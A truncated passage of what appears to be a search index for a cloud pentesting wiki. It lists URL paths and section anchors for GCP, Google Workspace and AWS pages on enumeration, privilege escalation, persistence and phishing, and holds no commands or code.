g-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#tls-boostrap-privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#secrets-in-kubelet-api","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#basic-infromation","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#components","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#cluster-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#job-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#connections","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#backups","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#authenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#access-info-with-appid-and-api-key","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-principals--org-policies-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#service-accounts","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#users--groups","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#default-permissions","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration-2","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-policies","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#key-protection-level","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#key-purposes","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#rotation-period--programmed-for-destruction-period","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#primary-version","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#logs-flow","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#configurations-supported-by-gcp-logging","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---memorystore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---monitoring-enum","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#policies","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#dashboards","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#channels","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#snoozers","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---pubsub-enum","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#snapshots--schemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---secrets-manager-enum","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#rotation-misuse","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---security-enum","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#security-command-center","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#threats","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#detections-and-controls","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#zero-trust","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---spanner-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---storage-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage-types","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#access-control","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versioning","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#retention-policy","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#public-access","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#hmac-keys","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#privesc-and-post-exploitation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#from-gcp-to-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#domain-wide-delegation-basics","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#compromise-existing-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#create-a-new-delegation-persistence","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#creating-a-project-to-enumerate-workspace","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#abusing-gcloud-credentials","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#from-gws-to-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#access-privileged-gcp-users","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#google-groups-privilege-escalation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#references","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---understanding-domain-wide-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#understanding-domain-wide-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#domain-wide-delegation-under-the-hood","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---unauthenticated-enum--access","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#public-assets-discovery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#public-resources-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#buckets-firebase-apps--cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---api-keys-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#api-keys","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#osint-techniques","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#check-origin-gcp-project","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#brute-force-api-endspoints","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---app-engine-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#brute-force-subdomains","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---artifact-registry-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#artifact-registry","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#dependency-confusion","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---cloud-build-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---cloud-functions-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#brute-force-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerate-open-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#enumerate-open-cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---cloud-sql-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---compute-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---server-side-request-forgery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#vulnerable-exposed-services","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-principals--org-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam--gcp-principals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#is-domain-used-in-workspace","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#enumerate-emails-and-service-accounts","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---source-repositories-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#source-repositories","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#compromise-external-repository","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---storage-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#storage","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#public-bucket-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#search-open-buckets-in-current-account","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---public-buckets-privilege-escalation","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#buckets-privilege-escalation","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#check-permissions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#escalating","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#references","pentesting-cloud/workspace-security/index.html#gws---workspace-pentesting","pentesting-cloud/workspace-security/index.html#entry-points","pentesting-cloud/workspace-security/index.html#google-platforms-and-oauth-apps-phishing","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-exploitation","pentesting-cloud/workspace-security/index.html#gws-gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--directory-sync-ad--entraid","pentesting-cloud/workspace-security/index.html#persistence","pentesting-cloud/workspace-security/index.html#context-aware-access","pentesting-cloud/workspace-security/index.html#account-compromised-recovery","pentesting-cloud/workspace-security/index.html#references","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---post-exploitation","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-groups-privesc","pentesting-cloud/workspace-security/gws-post-exploitation.html#access-groups-mail-info","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-pivoting","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---download-everything-google-knows-about-an-account","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---download-all-the-workspace-data-of-users","pentesting-cloud/workspace-security/gws-post-exploitation.html#contacts-download","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-drive-mining","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#modify-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#administrate-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#references","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistence","pentesting-cloud/workspace-security/gws-persistence.html#persistence-in-gmail","pentesting-cloud/workspace-security/gws-persistence.html#app-passwords","pentesting-cloud/workspace-security/gws-persistence.html#change-2-fa-and-similar","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-oauth-apps","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-delegation","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-android-app","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via--app-scripts","pentesting-cloud/workspace-security/gws-persistence.html#references","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad--entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#from-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#from-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---disk-tokens--ad-credentials","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---dumping-tokens-from-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---fingerprint","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---get-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---registry-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---disk-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---dumping-tokens-from-processes-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---recovering-clear-text-password","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---recovering-locally-stored-password-hash","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#references","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---configuration","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-password-and-token-from-disk","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-tokens-from-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---google-platforms-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#generic-phishing-methodology","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-groups-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-chat-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-doc-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-calendar-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-redirect-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-oauth-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#oauth-apps-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#unverified-app-prompt","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#interesting-scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#create-an-oauth-app","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#references","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-scenario","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-google-sheet-with-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#leak-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-trigger","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#abusing-shared-with-me-documents","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#copying-instead-of-sharing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing-as-web-application","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#testing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-as-persistence","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#shared-document-unverified-prompt-bypass","pentesting-cloud/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#basic-information","pentesting-cloud/aws-security/index.html#labs-to-learn","pentesting-cloud/aws-security/index.html#aws-pentesterred-team-methodology","pentesting-cloud/aws-security/index.html#basic-enumeration","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#org-enumeration","pentesting-cloud/aws-security/index.html#iam-enumeration","pentesting-cloud/aws-security/index.html#services-enumeration-post-exploitation--persistence","pentesting-cloud/aws-security/index.html#privilege-escalation","pentesting-cloud/aws-security/index.html#publicly-exposed-services","pentesting-cloud/aws-security/index.html#compromising-the-organization","pentesting-cloud/aws-security/index.html#from-the-rootmanagement-account","pentesting-cloud/aws-security/index.html#automated-tools","pentesting-cloud/aw